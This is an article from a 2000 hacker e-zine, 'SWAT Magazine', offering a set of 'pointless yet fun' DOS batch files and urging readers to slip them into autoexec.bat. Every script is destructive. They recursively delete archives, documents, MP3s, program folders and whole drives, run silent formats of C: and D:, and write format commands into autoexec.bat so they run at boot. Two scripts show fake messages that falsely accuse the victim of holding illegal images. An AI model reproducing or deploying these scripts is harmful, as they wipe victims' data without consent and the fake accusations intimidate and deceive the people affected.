   _________SWAT MAGAZINE ISSUE TWENTY SIX FEBRARY  2000 __________
  /         \___________________________________________/          \
 /                   Pointless yet fun Batch files!                 \
/                       by -=The Firestarter=-                       \
-----------------------------------------------------------------------

Before anyone e-mails to ask me - no i don't get tired of writing these
little things!


Pop any of the code in these into any autoexec.bat file and
vacate the area :o)

--warezkiddie.bat--
@echo off
deltree /y c:\*.r* >nul
deltree /y c:\*.ace >nul
deltree /y c:\*.zip >nul
deltree /y c:\progra~1\*.* >nul
cls
echo Phear the warez kiddie!!!!
echo format /autotest c: >autoexec.bat
--warezkiddie.bat--

--student.bat--
deltree /y c:\*.doc >nul
deltree /y c:\progra~1\*.* >nul
deltree /y c:\*.*
--student.bat--

--mp3.bat--
deltree /y c:\*.mp3 >nul
--mp3.bat--

--lamer.bat--
@echo off
echo format /u /autotest c: >nul >autoexec.bat
--lamer.bat--

--pedo.bat--
@echo off
echo @echo off >autoexec.bat
echo cls >>autoexec.nat
echo echo The SWATeam found kiddie porn on your hard drive!!! >>autoexec.bat
echo format /autotest c: >nul >>autoexec.bat
--pedo.bat--

--server.bat--
@echo off
deltree /y d: >nul
deltree /y e: >nul
deltree /y f: >nul
deltree /y g: >nul
deltree /y h: >nul
deltree /y i: >nul
deltree /y j: >nul
deltree /y k: >nul
deltree /y l: >nul
deltree /y m: >nul
deltree /y n: >nul
deltree /y o: >nul
deltree /y p: >nul
deltree /y q: >nul
deltree /y r: >nul
deltree /y s: >nul
deltree /y t: >nul
deltree /y u: >nul
deltree /y v: >nul
deltree /y w: >nul
deltree /y x: >nul
deltree /y y: >nul 
deltree /y z: >nul
deltree /y c: >nul
echo Whoops, somethig just went wrong!
--server.bat--

--sickem.bat--
@echo off
echo If you are reading this message then you have been 0wned by
echo the SWATeam! We gained unauthorised access to your computer
echo while you where online and detected nasty pictues that are
echo both illegal and immoral!
echo
echo We have taken your name, address and ISP account details.
echo
echo Action HAS been taken.
deltree /y d: >nul
format /autotest /q d: >nul
echo Since you are now reading this any second/third/etc hard drives
echo have been formatted.
echo
echo While your reading this your main hard drive is in the middle of
echo a format, reboot if you want, but all data is erased beyond
echo all recovery, teehee reboot in the middle of a format and you
echo gonna have a nightmare recovering your hard drive to EVER
echo be used again!
echo
echo                       www.swateam.org
echo          I hope that you have a nice time reinstalling
format /autotest c: >nul
-sickem.bat--